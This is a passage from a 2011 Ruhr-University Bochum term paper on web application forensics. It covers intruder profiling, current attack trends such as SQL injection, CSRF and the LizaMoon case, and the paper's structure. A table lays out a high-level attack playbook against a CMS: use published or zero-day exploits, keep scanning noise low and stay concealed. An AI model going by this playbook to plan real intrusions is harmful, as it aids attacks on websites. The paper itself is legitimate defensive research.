Web Application Forensics: Taxonomy and Trends

Web Application Forensics
Taxonomy and Trends

term paper

Krassen Deltchev
Krassen.Deltchev@rub.de

5. September 2011

Ruhr-University of Bochum
Department of Electrical Engineering and Information Technology
Chair of Network and Data Security
Horst Görtz Institute

First examiner: Prof. Jörg Schwenk
Second Examiner and Supervisor: M.Sc. Dominik Birk

Contents
List of Figures .................................................................................................................................. 3
List of Tables ................................................................................................................................... 3
Abbreviations ................................................................................................................................... 4
Abstract ............................................................................................................................................ 5
1. Introduction .................................................................................................................................. 7
1.1. What is Web Application Forensics? .................................................................................... 7
1.2. Limitations of this paper ....................................................................................................... 8
1.3. Reference works ................................................................................................................... 9
2. Intruder profiles and Web Attacking Scenarios .......................................................................... 11
2.1. Intruder profiling ................................................................................................................. 12
2.2. Current Web Attacking scenarios ........................................................................................ 14
2.3. New Trends in Web Attacking deployment and preventions .............................................. 15
3. Web Application Forensics ......................................................................................................... 19
3.1. Examples of Webapp Forensics techniques ........................................................................ 23
3.2. WebMail Forensics ............................................................................................................. 25
3.3. Supportive Forensics ........................................................................................................... 27
4. Webapp Forensics tools .............................................................................................................. 29
4.1. Requirements for Webapp forensics tools .......................................................................... 29
4.2. Proprietary tools .................................................................................................................. 31
4.3. Open Source tools ............................................................................................................... 34
5. Future work ................................................................................................................................ 39
6. Conclusion .................................................................................................................................. 41
Appendixes .................................................................................................................................... 42
Appendix A .................................................................................................................................... 42
Application Flow Analysis ............................................................................................................ 42
WAFO victim environment preparedness ...................................................................................... 44
Appendix B .................................................................................................................................... 45
Proprietary WAFO tools ................................................................................................................ 45
Open Source WAFO tools ............................................................................................................. 48
Results of the tool's comparison .................................................................................................... 49
List of links .................................................................................................................................... 50
Bibliography .................................................................................................................................. 52

2

List of Figures
Figure 1: General Digital Forensics Classification, WAFO allocation ............................................. 8
Figure 2: Web attacking scenario taxonomic construction .............................................................. 15
Figure 3: Digital Forensics: General taxonomy .............................................................................. 20
Figure 4: WAFO phases, in Jess Garcia[1] ...................................................................................... 21
Figure 5: Extraneous White Space on Request Line, in [3] ............................................................ 23
Figure 6: Google Dorks example, in [3] .......................................................................................... 24
Figure 7: Malicious queries at Google search by spammers, in [3] ................................................ 24
Figure 8: faked Referrer URL by spammers, in [3] ......................................................................... 24
Figure 9: RFI, pulling c99 shell, in [3] ............................................................................................ 24
Figure 10: Simple Classic SQLIA, in [3] ........................................................................................ 25
Figure 11: NBO evidence in Webapp log, in [3] ............................................................................. 25
Figure 12: HTML representation of spam-mail( e-mail spoofing) .................................................. 26
Figure 13: e-mail header snippet of the spam-mail in Figure 12 .................................................... 26
Figure 14: Spam-assassin sanitized malicious HTML redirection, from example Figure 12 ......... 27
Figure 15: Main PyFlag data flow, as [L26] .................................................................................... 35
Figure 16: Improving the Testing process of Web Application Scanners, Rafal Los [10] .............. 43
Figure 17: Flow based Threat Analysis, Example, Rafal Los [10] .................................................. 43
Figure 18: Forensics Readiness, in Jess Garcia [13] ....................................................................... 44
Figure 19: MS LogParser general flow, as [L16] ............................................................................ 45
Figure 20: LogParser-scripting example, as [L17] .......................................................................... 45
Figure 21: Splunk licenses' features ................................................................................................ 46
Figure 22: Splunk, Windows Management Instrumentation and MSA( ISA) queries, at WWW .. 47
Figure 23: PyFlag- load preset and log file output, at WWW ......................................................... 48
Figure 24: apache-scalp or Scalp! log file output( XSS query), as [L25] ....................................... 48

List of Tables
Table 1: Abbreviations ....................................................................................................................... 4
Table 2: A proposal for general taxonomic approach, considering the complete WAFO description ...
11
Table 3: Example of possible Webapp attacking scenario ............................................................... 16
Table 4: Standard vs. Intelligent Web intruder ................................................................................ 17
Table 5: Web Application Forensics Overview, in [15] ................................................................... 21
Table 6: A general Taxonomy of the Forensics evidence, in [1] ..................................................... 22
Table 7: Common Players in Layer 7 Communication, in Jess Garcia [1] ..................................... 22
Table 8: Traditional vs. Reactive forensics Approaches, in [13] ..................................................... 29
Table 9: Functional vs. Security testing, Rafal Los [10] ................................................................. 42
Table 10: Standards & Specifications of EFBs, Rafal Los [10] ...................................................... 42
Table 11: Basic EFD Concepts [10] ................................................................................................ 42
Table 12: Definition of Execution Flow Action and Action Types, Rafal Los [10] ........................ 42
Table 13: TRR completion on LogParser, Splunk, PyFlag, Scalp! ................................................. 49
Table 14: List of links ...................................................................................................................... 51

3

Abbreviations
Anti-Virus AV
Application-Flow Analysis AFA
Business-to-Business B2B
Cloud-computing CC
Cloud(-computing) Forensics CCFO
Digital Forensics DFO
Digital Image Forensics DIFO
Execution-Flow-Based approach EFB
Incident Response IR
Microsoft MS
Network Forensics NFO
Non- persistent XSS NP-XSS
NULL-Byte-Injection NBI
Operating System(s) OS(es)
Operating System(s) forensics OSFO
Persistent( stored) XSS P-XSS
Proof of Concept PoC
Regular Expression RegEx
Relational Database System RDBMS
Remote File Inclusion RFI
SQL Injection Attacks SQLIA
Tool's requirements rules TRR
Web Application Firewall(s) WAF(s)
Web Application Forensics WAFO
Web Application Scanner WAS
Web Attacking Scenario(s) WASC
Web Services Forensics WSFO
Table 1: Abbreviations

4

Abstract

The topic, covering Web Application Forensics is challenging. There are not enough references,
discussing this subject, especially in the Scientific communities. Often is the the term 'Web
Application Forensics' misunderstood and mixed with IDS/ IPS defensive security approaches.
Another issue is to discern the Web Application Forensics, short Webapp Forensics, from Network
Forensics and Web Services Forensics, and in general to allocate it in the Digital/ Computer
Forensics classification.
Nowadays, Web Platforms are vastly growing, not to mention the so called Web 2.0 hype.
Furthermore, Business Web Applications blast the common security knowledge and premise rapid
inventory of the current security best practices and approaches. The questions, concerning the
automation of the security defensive and investigation methods, are becoming undeniable
important.
In this paper we should try to dispute the questions, concerning taxonomic approaches regarding the
Webapp Forensics; discuss trends, referenced to this topic and debate the matter of automation tools
for Webapp forensics.

Keywords
Web Application Security, WebMail Security, Web Application Forensics, WebMail
Forensics, Header Inspection, Plan Cache Inspection, Forensic Tools, Forensics
Taxonomy, Forensics Trends

5

1.Introduction

1. Introduction

In [1], Jess Garcia gives a definition of the term 'Forensics Readiness':
“ Forensics Readiness is the “art” of Maximizing an Environment's Ability to collect Credible
Digital Evidence”. This statement we should keep in mind in the further exposition of the paper. It
points out several important aspects. Foremost, forensics rely on maximal collection of digital
evidence. If the observed environment1 is not well prepared for forensic investigation, discovering
the root, for the system is been attacked, could be: sophisticated, not efficient in time and even non
deterministic in finding an appropriate remediation of the problem.
Another essential aspect of Forensics, as Jess Garcia, is- the forensic investigation is an art.
It is obvious to point out furthermore that, defining best practices, concerning the proper
deployment of forensic work, is unbefitting. An intelligent intruder will always find drawbacks in
such best-practice scenarios and try to exploit them as well to accomplish new attacks, complete
them successfully and remain concealed.
In this way of thoughts, appears the question, how can we suggest taxonomy, regarding forensic
work, if we are aware a priori of the risks such recipes include?
We shall propose several general intruders' strategies and profiling of the modern Web attacker in
the paper, keeping in mind not to hurt the universal validity of the statements we discuss. In some
cases we shall give examples and paradigms through references, though only for the matter of the
good illustration of the statements in the current thesis.
Let us describe more precisely the matters, concerning the Webapp Forensics in the next section.

1.1. What is Web Application Forensics?

Web Application Forensics( WAFO) is a post mortem investigation of a compromised Web
Application( Webapp) system. WAFO consider especially attacks on Layer 7 of the ISO/OSI model.
In distinction to this, capturing and filtering of internet protocols on-the-fly is not a concern of the
Webapp forensics. More precisely, such issues in general are in the focus of Network
Forensics( NFO). Nevertheless, examining the log files of such automated tools( IDS/ IPS/ traffic
filters/ WAF etc.) is supportive for the right deployment of the Webapp forensic investigation.
As stated above, NFO examine in concrete such issues, that's why we should like to discern Webapp
Forensics from it, keeping in mind the supportive function, which Network forensic tools can
supply to WAFO.
Consequently, we should like to specifically allocate WAFO in the Digital Forensics( DFO)
structure, because some main topics in DFO are not implicitly referred to Layer 7 of the ISO/OSI
Model. Such should be designated as follows: Memory Investigations, Operating Systems Forensics
investigations, Secure Data Recovery on physical storage of OSes etc. Nevertheless, DFO consider
investigations of image manipulations [L1], [L2], which in some cases could be also very
supportive for the proper deployment of WAFO.
At last, we should categorize WAFO as a sub-class of Cloud Forensics( CCFO) [2]. Cloud
1 we assume that, the reader understands the abstraction of the Webapp as a WAFO environment

7

1.Introduction

Forensics is a relatively new term in the Security communities. Historically, the existence of Web
Applications lead in phase to the Cloud-Computing( CC). Concerning the complexity of the Web
applications, platforms and services presented by the CC, CCFO cover larger investigation areas
than the WAFO. As an example, WAFO is not explicitly observing fraud on Web Services. Web
Services are covered by the Web Services Forensics( WSFO), another sub-class of CCFO, and
should be categorical discerned from WAFO, please read further.
Let us illustrate the DFO taxonomic structure in the next Figure:

Figure 1: General Digital Forensics Classification, WAFO allocation

On behalf of this short introduction of the different Computer Forensics categories, let's designate
explicitly the limitations of the paper. This concerns the better understanding of the paper's
exposition and explain the absence of examples, covering different exotic attacking scenarios.

1.2. Limitations of this paper

This term paper discusses Web Application Forensics, which excludes topics as on-the-fly packet
capturing, packet inspection of sensitive data over ( security) internet protocols. Once again to
mention, it does not cover attacks, or attacking scenarios on lower layer than Layer 7 ISO/ OSI
Model. For the interested reader, a very good correlation of the Layer 7 Attacks and below,
concerning Web Application Security and Forensics can be found at [3]. In distinction to Web
Services Forensics [5] and CCFO [2], the presented paper covers only a small topic, concerning the
varieties of fraud Web Applications:
• RIA( AJAX, RoR2, Flash, Silverlight et al.) ,

2 RoR- Ruby on Rails, http://rubyonrails.org/

8

1.Introduction

• static Web Applications,
• dynamic Web Applications and Web Content( .asp(x), .php, .do etc. ),
• other Web Implementations( like different CMSes), excluding research on fraud, concerning
Web Services Security, or CC Implementations, but explicitly Web Applications.
Due to the marginal limitations of the term paper, the reader shall find a couple of illustrating
examples, which do not pretend to cover the variety of illustrative scenarios of Web Attacking
Techniques and Web Application Forensics approaches.
For the reader concerned, attacks on Layer 7 are introduced and some of them discussed in detail
at [4].
Furthermore, we should denote a clarification, regarding the references in this paper, considering
their proper uniformity, as follows. General knowledge should be referenced by footnotes at the
appropriate position. The scientifically approved works are indexed at the end of the paper in the
Bibliography, as ordinary. Non scientifically approved works, also video-tutorials, live video
snapshots of conferences, blogs etc. are indexed by the List of links after the Appendix of this paper.
We should imply this strict references' sources division, with respect to the Security Scientific
Communities. In addition to this, let us introduce some of the interesting related works dedicated
on the topic of WAFO.

1.3. Reference works

An extensive approach, covering the different aspects of Web Application Forensics, is given in the
book “Detecting Malice” [3], by Robert Hansen3. The interested reader can find much more than
just WAFO discussions in this book, but in addition to these also examples of attacks on lower level
than Layer 7, correlated to the WAFO investigations and many paradigms, derived from real-life
WAFO investigations.
The unprepared reader should notice that, the topics in the book, discussing WAFO tools, are
limited. The author of the book points out the sentence, that every WAFO investigation should be
considered as unique, especially in its tactical accomplishment, therefore favoring of top automated
tools, should be assumed as inappropriate, please read further.
Another interesting approach is given by SANS Institute as Practical Assignment, covering three
notable topics: penetration testing of a compromised Linux System, a post mortem WAFO on the
observed environment and discussions on the legal aspects of the Forensics investigation [6].
Despite the fact that, this tutorial in its Version 1.4 is no more relying on an up-to-date example, it
illustrates very important basics, concerning WAFO and can be used still as a fundamental reading
for further research on the WAFO topic.
BSI4, Germany, describes in the Section, Forensic Toolkits, at “Leitfaden “IT-Forensik” [7], Version
1.0, September 2010, different Forensic tools for automated analysis, many of them concerning
implicitly WAFO. The toolkits are compared by the following aspects:
• analyzing of log-data,

3 http://www.sectheory.com/bio.htm
4 https://www.bsi.bund.de/EN/Home/home_node.html

9

1.Introduction

• tests, concerning time consistency,
• tests, concerning syntax consistency,
• tests, concerning semantic consistency,
• log-data reduction,
• log-data correlation, concerning integration and combining of different log-data sources in a
consistent timeline, integration/ combining of events to super-events,
• detection of timing correlations( MAC timings) between events.
The given approaches can be related to WAFO log file analysis, which designates them as
reasonable supportive WAFO investigation methods.
Another tutorial, giving basic overview, which should be also considered as fundamental regarding
WAFO research, is: “Web Application Forensics: The Uncharted Territory”, presented at [8].
Although, the paper is published in 2002, it should not be categorized it in a speedy manner as
obsolete.
Other papers, articles and presentation papers, concerning specific WAFO aspects, complete the
group of the related references, concerning the Web Application Forensics research in this term
paper. These should be referenced at the appropriate paragraphs in the paper's exposition and not be
discussed individually in this section, furthermore.
Let's describe the structure of the term paper. Chapter 2 should give a taxonomic illustration on the
topics, designating intruders' profiling and modern Web Attacking Scenarios. Chapter 3 deliberates
WAFO investigation methods and techniques more detailed and concerns further discussion on the
matter of signification of a possible WAFO taxonomy. In Chapter 4 are illustrated the WAFO
investigation supportive tools. An important section outlines the questions, concerning the
requirements of WAFO toolkits, which points out the reasonable aspects for determining the tools
either as relevant, or inappropriate for adequate WAFO investigations. Two major group of favorite
tools should be designated: Proprietary Toolkits and Open Source solutions. Chapter 5 represents
the final discussion on the paper's thesis and suggestions for future work on behalf of the discussed
topics in the former chapters. In Chapter 6 is deliberated the Conclusion on the proposed thesis.
The Appendix demonstrates an additional information( tables, diagrams, screenshots and code
snippets) on specific topics, discussed in the exposition part of the paper.
Let us proceed with the description of the Web Attacking Scenarios and ( Web) Intruder profiles.

10

2.Intruder profiles and Web Attacking Scenarios

2. Intruder profiles and Web Attacking Scenarios

In the introduction part of this thesis is outlined that, the scientifically approved research,
concerning Web Application Forensics by the Security and Scientific Communities, should be still
considered as insufficient and as not well-established. That's why, an appropriate categorization of
the different Forensic Fields and the correct allocation of WAFO in the Digital Forensics hierarchy
are adequately appointed as required in the former chapter, which satisfies one of the objectives of
the current paper.
For all that, this classification does not present a complete fundamental basis for further academic
research on WAFO. Therefore, we should extend the abstract Model, concerning WAFO, by
introducing two other fundamentals: the profile of the modern Web intruder and methodologies as
abstract schemae, current Cyber ( Web) attacks are accomplished by.
Thus, we should follow the proposed schema for describing completely the aspects of WAFO, see
the following Table:
1. represent the Digital Forensics hierarchy and
2. allocate the field of interest, concerning WAFO,
3. explain the Security Model, WAFO is observing, by:
• designating the intruder,
• describing the victim environment( Webapps),
• specifying the fraudulent methods;
4. demonstrate the WAFO tasks, supporting the security remediation plan

Table 2: A proposal for general taxonomic approach, considering the complete WAFO description

In this way of thoughts, we should stress that, the intruders' attacks on existing Web Applications
and other Web Implementations nowadays, should be denoted as highly sophisticated. Such Web
attacks are rapidly adaptive in their variations and alternations, and in some cases precarious to be
effectively sanitized. Example of such attacks like CSRF, Compounded SQLIA and Compounded
CSRF are described in [4]. A good representative in this group is the famous Sammy worm, which
is still wrongly considered to be a pure XSS Attack. Another confusing example demonstrate the
Third Wave of XSS Attacks, DOM based XSS( DOMXSS) [20]. The fact that, DOMXSS attacks
cannot be detected by IDS/ IPS, or WAF systems, if the payload is obfuscated as an URL
parameter, e.g. Web Application server do not record HTML parameters in the log file, but only the
primary URL prefix, should be designated as ominous. If the nature of such Attacking scenarios is
fundamentally mistaken, then it is a matter of time that, attacks' derivatives should success in their
further fraudulent activities on the Web.
The task to sanitize a compromised Web application by CSRF is very difficult. It requires immense
efforts of Reverse Engineering and Source Code rectification in reasonable boundaries for time and
efficiency. The more general problem is, Web Applications are per se not stealth5. Thus, hardening a

5 Exceptions to these could be Intranet-Webapps, which designate another class of Webapps, concerning the term

11


Webapp is not equivalent to hardening of a local host. In other words, the utilization of known
preventive techniques, like security-through-obscurity, should be anted to secured Intranet Web
applications, Admin Web Interfaces, non-public FTP servers etc., but commercial B2B Webapps,
On-line Banking, Social Network Web sites, On-line magazines, WebMail applications and others.
These last mentioned applications are meant to be employed from all over the world per definition;
they exist, because of the huge amount of their users and customers per se. That's why, the securing
of such Web constructs is more complex and intensive. Of course, there are basic and advanced
authentication techniques applied to Web implementations, though these do not make the Webapp
stealth for intruders. They just apply the so called user restriction for using sensitive parts of the
Web implementation. In this way of thoughts, pointing out exaggerative cases of Web fraud like
Child pornography and personal image offending issues, is only the top of the iceberg of examples
for Web crime. The problem is, nowadays Identity Theft and speculations with sensitive personal
data, should not be further categorized as exotic examples of existing Cyber crimes6 over the
internet on Web Platforms. Such crimes designate an everyday persistence. Social networks, social
and health insurance companies strive for more impressive Web representation. E-Commerce
Platforms for daily monetary transactions are undeniable nowadays. We should not consider
nowadays Web 2.0 as a hype, we should keep in mind that, the former dynamic E-commerce Web
representations become nowadays sophisticated RIA Web platforms. Such Webapps respect the
better marketing representation of the Business Logic of the firms, which profit depends at the
present days on the complexity, rapidly changing dynamic adaption and more user-friendly features
for satisfying the Web customer at any time. These aspects explain the huge intruders' interest for
compromising Web applications, and furthermore Web Services as well. There is no kind of
deterministic conclusions on the prediction of Web Attacking Scenarios, or the amount of the
damage they cause every day.
In [3], Robert Hansen compares the intensity of Web Attacks' representations and amount of
damage they cause comparatively to the computer viruses. Both of the security topics should not
loose attention of the Security communities for a long period of time. Moreover, as already stated,
their remediation could not be ascertained straight-forward. As we know, there is no default
approach for proper sanitization against computer viruses. The same statement is applicable for
Webapp attacking scenarios. Rather, it is a matter of extensive 24/7/365 deployment of proper
security hardening techniques and strategies, and the adaptive improvement of those. Knowing your
friends is good, knowing your enemies is crucial. Let's proceed in this way of thoughts, after giving
this conclusive explanation for the motivational purpose of the paper, with the representation of
modern Web fraud in detail as follows.

2.1. Intruder profiling

Two general categories should be designated in this section: the standard intruder profile and the
profile of the intelligent intruder, performing terrible Cyber crime, short- intelligent intruder profile.
We should use the adjective 'intelligent', describing the second intruder's profile, as very reasonable,
respecting the fact- if we as representatives of the Security Communities, pretend to posses
knowledge and know-how, concerning the proper deployment of our duties, this kind of intruders
posses it too and much more.

paper's definitions, where extensive intruder's effort is a pre-requirement for breaking the Intranet security, and
should not be discussed here as relevant.
6 http://www.justice.gov/criminal/cybercrime/

12


There are also fuzzy definitions of intruders, which designate states in between the above
mentioned ones. In fact, these profiles are very agile in their representation. For example- a 'former'
intelligent intruder should be categorized better as a latent one, and a motivated standard attacker
should not be disrespected. This violator could fulfill the requirements of the category, related to the
intelligent intruder profile, at any time with sufficient likelihood.
In the category of standard intruder we should determine: script kiddies and hacker wannabes,
“fans” of YouTube, or other video platforms, capturing knowledge and know-how from easy how-to
video tutorials. Bad configured robots and spiders, and any other kind of not well educated, not
enough motivated, even not enough skilled daily violators. Specific for this group of intruders is the
lack of personal knowledge and know-how, utilization of well known attacking techniques and
scenarios well-established on the Web. Such violators are ignorant to and disrespecting the noise7
they produce, while trying to accomplish the attacks. These features explain the deduction- a
standard attacking scenario, could be sanitized in greater likelihood with standard prevention and
hardening techniques( best-practices). In cases of successfully deployed attack(s) on behalf of such
standard scenarios, the investigation and detection approaches could be considered as standard with
greater likelihood too.
For all that, there are cases, which represent attacking scenarios, designated as shadow scenarios. It
is not important, whether these are accomplished successfully, or not at the specific time of the
attack's deployment. Their utilization is to cover the deployment of the real attacking scenario.
That's why, we should rather concern, whether these are cases of intelligent intruders' attacks.
The group of intelligent intruders should deliberate: 'former' ethical hackers; pen testers; security
professionals, who have changed sides, disrespecting their duties; intelligently set up automated
tools for Web Intrusion, such as Web Scanners, Web Crawlers, Robots, Spiders etc.
The most notable feature describing these representatives is the possession of inferior independent
knowledge and know-how. Furthermore, patience, accuracy in the accomplishment of the attacking
scenario deployment, strive to learn and assimilate new know-how.
Interesting examples, related to this profile, are given at [3]. We should mention some types of such
ones. Intelligent hackers are recruited by law firms to achieve a Proof of Concept( PoC) on a
targeted Web implementation. If the PoC is positive, this could alter the outcome of the legal case,
as this PoC could be used as decisive juristic evidence in most of the situations in account of the
hacker recruiting law firm. Such intruders' attacks are difficult to be detected right on time.
Furthermore, there are other cases, where the damage of the accomplished attack is the determinant
alarm after havoc is consequently presented. As already stated, the sanitization of the compromised
Web Application(s) after such successful attacks is in some cases unfeasible and more often requires
sophisticated methods to be achieved. Examples of these are CSRF compromised Webapps, like the
case: PDP GMail CSRF attack8, see also [4]. Therefore, reasonable supportive part to the accurate
sanitization of the compromised Webapp, demonstrates the proper deployment of Web Application
Forensics investigations.
Let's mention several examples of modern Web Attacking Scenarios in the next section of
Chapter 2.

7 We should emphasize here: the Communication Complexity and amount of false positive attempts by the violator(s)
in their strive to complete the intended Web attacking scenario(s), which should not be mistaken with the utilization
of attacking techniques, where producing communication noise is the core of the attacking strategy, like different
DDoS implementations: Fast Fluxing SQLIA, DDoS via XSS, DDoS via XSS with CSRF etc.
8 http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

13


2.2. Current Web Attacking scenarios

In May, 2009 Joe McCray9 concludes in his presentation [9] on 'Advanced SQL Injection' at
LayerOne10, that Classic SQLIA should no more be categorized as a trend or conventional.
In [4] Classic SQLIA are discussed as a part of the current SQLIA taxonomy till 2010. Despite the
fact, their categorization by Joe McCray should be respected as reasonable. This controversial issue
is presented at many of the current Web Attacking Vectors. To achieve a complete taxonomic
approach, pertaining to a concrete Webapp Attacking vector, many obsolete representations of the
Attacking sub-classes should be illustrated, revering the real Web Environment. The mentioned
above Classic SQLIA illustrate obsolete and more over unfeasible Attacking Techniques,
considering the properly employed modern defensive methods. The main reason, explaining this
issue is- Web platforms are vastly changing, not only according to its development aspects, but
rather the attacking and security hardening scenarios, anted to them. Most likely, an intelligent
intruder should not use obsolete techniques, because of the expectant presence of Web Application
security protection. Detecting deployment of obsolete Attacking Scenarios on a modern Web
construct, could be classified as an investigation on the standard intruder's profile. Nevertheless,
this conclusion should not be underestimated, as previously discussed, see shadow scenarios.
Let's give some interesting examples of current successful accomplished Web Attacks.
In July, 2009 a dynamic CSRF Attack is accomplished on the Web Platform of Newsweek [4], [L4].
The Tool, called MonkeyFist11, utilized for this first completely automated CSRF Attack, represents
a Python- based small web server, configured via XML. The victim site is been already hardened
via protecting of the generation of its dynamic elements by security tokens12 and strong session IDS.
For all that, this new attacking technique achieves positive results, which designates open questions,
concerning the impact of the 'See surfing' sleeping giant.
Another recent attack is the SQLIA over the British Navy Website[L5] in November, 2010, which
was only meant to be a PoC by a Romanian hacker, that Web Application Security can be broken
even at such high-level hardened Web Implementations.
In April 2011, different mass infection by SQLIA is detected. 28000 Web sites are compromised,
even several Apple Itunes Store index sites are infected. The SQLIA injects a PHP script, which
redirects the user to a cross-origin phishing site, pretending to deliver an on-line Anti-Virus( AV)
protection. The attack is known in the Security Communities as LizaMoon Mass SQLIA13 [L6].
The list of such impressive Web Attacking incidents can be proceeded, which should not be
enumerated further in the paper. The interested reader should refer further to :
• The Web Hacking Incidents Database14
• OWASP Top Ten Project15

9 http://www.linkedin.com/in/joemccray
10 LayerOne- IT- Security conference, http://layerone.info
11 http://www.neohaxor.org/2009/08/12/monkeyfist-fu-the-intro/
12 The anti-CSRF token is originally suggested by Thomas Schreiber, in 2004:
www.securenet.de/papers/Session_Riding.pdf
13 http://blogs.mcafee.com/mcafee-labs/lizamoon-the-latest-sql-injection-attack
14 http://projects.webappsec.org/w/page/13246995/Web-Hacking-Incident-Database
15 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

14


At the end of this Chapter let's deliberate some interesting trends, concerning the current Web
Attacks.

2.3. New Trends in Web Attacking deployment and preventions

Discussing the deployment of Web Attacks, we should consider a more realistic approach, for
categorizing Web Attacking Vectors. As mentioned above, there are two general profiles of the Web
Intruders. Keeping in mind, the differences of the Attacks' deployment and the level of Attacks'
sophistication, it should be more appropriate to discuss the accomplishment of Web Attacking
Scenarios, rather than the deployment of Web Application Attacks. In such Attacking Scenarios,
which represent a fundamental construct, the Web Attacks should be denoted as execution
techniques in a given attacking setting. This allows us to define single layer attacks, multi-layer
attacks, and special attacking sequences as specific implementations in the realization of the Web
Attacking Scenario. Such scenarios can adequately illustrate the intention of the different profiles of
Web Intruders. In distinction to the intelligent Web Intruder, the standard Intruder tries to
accomplish a simple attacking scenario, reduced to the utilization of a special Web attacking
technique. The Web attacking scenario represents a simple deployment construct: try a well-
established attacking procedure(s) and wait for result(s), no matter what.
As mentioned above, the intelligent Intruder utilizes more sophisticated scenarios. Some of them
could be planned and sequentially accomplished in a long period of time, till achieving the expected
result(s). There are cases in which the intelligent attacker could gain enough feedback from the
victim application and thus intentionally reduce the attacking scenario to the deployment of one or a
compact amount of attacking techniques, which resembles the scenario to the level of the standard
intruder's scenario. Nevertheless, important aspects like utilization of non-standard attacking
techniques and less noise at the attacking environment obviously discern the one profile from the
another. These conclusions should be extended in the Chapters, concerning the more detailed
representation of WAFO.
Let's illustrate the Web Application Scenario construction in the next Figure:

Figure 2: Web attacking scenario taxonomic construction

15


The proposed construct should be extended in the next Table, which denotes an example of a
possible Web attacking scenario:
Example Attack on well-known CMS
[inject c99 shell on the CMS, as a paradigm]
Scenario • What is the particular goal: PoC, ID Theft, destroying Personal Image etc.
• determine the CMS version,
• determine the technical implementation type: concurrent attacking, or sequentially attacking
of specific Webapp modules
• localize the modules to be compromised: Web Front-end, RDBMS, WebMail interface,
News feeder etc.
• if CMS version obsolete:
• find published exploits( at best 0days16) and utilize them to gather feedback from
the victim environment
• respect scanning noise as low as possible
• if version is up-to-date utilize:
• blind application scanning techniques with noise reduction and wait for positive
feedback
• analyze the results and proceed with further more specific attacking techniques
• if success, utilize a refinement of the attack and if of interest, wait for CMS admins reaction-
gives feedback on sanitization response time, efforts, utilized hardening techniques etc.
• if not successful:
• audit the gathered feedback
• wait for new published 0day exploits
• develop a 0day(s) independently
• utilize an scenario sequence execution loop till achieving the goal with respect to:
• ( communication) attacking noise
• and...try to stay concealed
Technique(s) XSS: SQLIA: CSRF CSFU Particular ... Common well-
(these should * NP-XSS17 * error 0day(s) established
be ordered, or * P-XSS response like:
reordered * timing sniffing for open
according the SQLIA ... admin debugging
attacking console access on
scenario) port 1099
Procedures NP-XSS: Error response SQLIA: ...
( these should • detect dynamic modules on the Webapp, • Step 1,
be ordered, or • find variables to be compromised, • Step 2,
reordered as • craft the malicious GET- Request and
appropriate) taint the input value of the variable to be • …
exploited • Step n;
• gather feedback
• resemble the procedure till expected
results are achieved
• spread the malicious link to as many as
possible 'Confused Deputies'[4]

Table 3: Example of possible Webapp attacking scenario

16 http://netsecurity.about.com/od/newsandeditorial1/a/aazeroday.htm
17 NP- XSS denotes non-persistent XSS; P-XSS abbreviates the Persistent XSS

16


How this respects the proposed profiles of modern Web intruders, should be illustrated as:
Profile Standard Intruder Intelligent Intruder
Attacking Scenario static: highly dynamically adaptive18
execution remains on the level of published
and well-established 'Web attacks'
Techniques static: could remain static, but preferably
(as a comment: … better watch it on the Cyber criminal would adapt
YouTube19, see [4]) according the successful
completion of the Attacking
Scenario
Procedures static: Could be static, but preferably the
“... just copy and pase”, Intruder should seek for a 0day(s)
0day with less likelihood
Table 4: Standard vs. Intelligent Web intruder

Another important aspect, respecting the prevention and sanitization of successfully deployed Web
Application Attacking Scenarios, is illustrated by Rafal Los20 in his presentation at OWASP
AppSecDC in October, 2010 [10]. Main topic of his research, concerns the Execution-Flow-Based
approach as a supportive technique to the Web Application security (pen-)testing. The utilization of
Web Application scanners( WAS) should be determined as impressive, supporting the pen-testing
job of the security professional/ ethical hacker and not to forget the intelligent intruder [11], [4].
Indeed, WAS can effectively map the attacking surface of the Webapp, intended to be compromised.
Still, open questions remain, like- do WAS provide full Webapp function- and data-flow coverage,
which reports greater feedback, concerning a complete security auditing of the Web construct in
detail. Most of the pen-testers/ ethical hackers, do not care what kind of functions, related to the
Webapp, should be tested. If they do not exactly know the functional structure and the data-flow of
the Web Application, how should they consider appropriate and complete functional coverage
during the pen-testing of the Webapp?
The job of the pen-tester is to reveal exploits and drawbacks in the realization of a Web Application
prior to the intelligent intruder. Consequently to this, appears the next question, what are the
objective parameters to designate the pen-testing job completed and well-done?
As Rafal Los states, nowadays the pen-testing of Webapps, utilizing WAS, should be still digested
as “point'n'scan web application security”. The security researcher suggests in his presentation that,
a more reasonable Webapp hardening approach is the combination of the Application
function-/data-flow analysis with the consequent security scanning of the observed Web
implementation. A valuable comparison between the Rafal Los' indicated approach and the common
security testing of Webapp(s), outlining the drawbacks of the second one, is given in
Table 9, Appendix A.

18 Respecting the current level of sanitization know-how, produced attacking noise, reactions of the security
professionals to sanitize the particular Webapp, the specific goal for compromising the victim Webapp
19 The author of the paper do not intend to be offensive to YouTube, nevertheless the facts are: this video on-line
platform is well-established and popular, there are tons of videos, hosted on it, concerning: Classic SQLIA
derivatives, XSS derivatives etc., which could be easily found and utilized by script kiddies, hacker wannabes ...
20 http://preachsecurity.blogspot.com/

17


Let's summarize these drawbacks, as follows. The current Webapp pen-testing approaches via
scanning tools do not deliver adequate functional coverage of modern and dynamic high
sophisticated Web Applications. Furthermore, the Business Logic of the Webapp(s) is often
underestimated as a requirement for the proper pen-testing utilization. A complete coverage of the
functional mapping of the Web Application could still not be approved. If the application execution
flow is not explicitly conversant, the questions, regarding completeness and validity of the results
from the tested data, should be denoted as open.
Therefore, Rafal Los suggests, utilization of Application-Flow Analysis( AFA) in the preparation
part prior to the deployment of the specific Web Application scanning. This combination of the two
approaches should deliver better results than those from the blind point'n'scan examinations.
Explanation of this approach is illustrated in Figures 16, 17 and Tables 10, 11, 12, given at
Appendix A. For more information, please refer to [10], or consider studying the snapshot of the
live presentation[L7].
We should designate these statements as highly applicable for the better utilization of WAFO, as
well. The lack of complete and precise knowledge of the functional structure and data flow of the
forensically observed Webapp, should definitely detain the proper and accurate implementation of
WAFO. We should keep in mind these conclusions and extend them in the following Chapters of
the paper.
Let's proceed with the more detailed representation of the Web Application Forensics.

18

3.Web Application Forensics

3. Web Application Forensics

The main task, this Chapter represents, is to proceed further with the taxonomic description of
WAFO, by describing the victim environment, e.g. to designate in detail the Web application in
production environment. This should be specifically utilized on behalf of the facts: explaining, how
Webapp forensics is applied to this environment; determining, what are the main concerning aspects
to WAFO; establishing these statements via particular examples and outlining collaborative
techniques, which extend the proper WAFO investigation. See again Table 2.
We proposed in the former Chapters that, utilizing WAFO on behalf of best practices and only
should not be considered as reasonable. Presuming this, we should emphasize further explicitly
that, trial-and-error approaches and conclusions,relying on personal experience and high-level
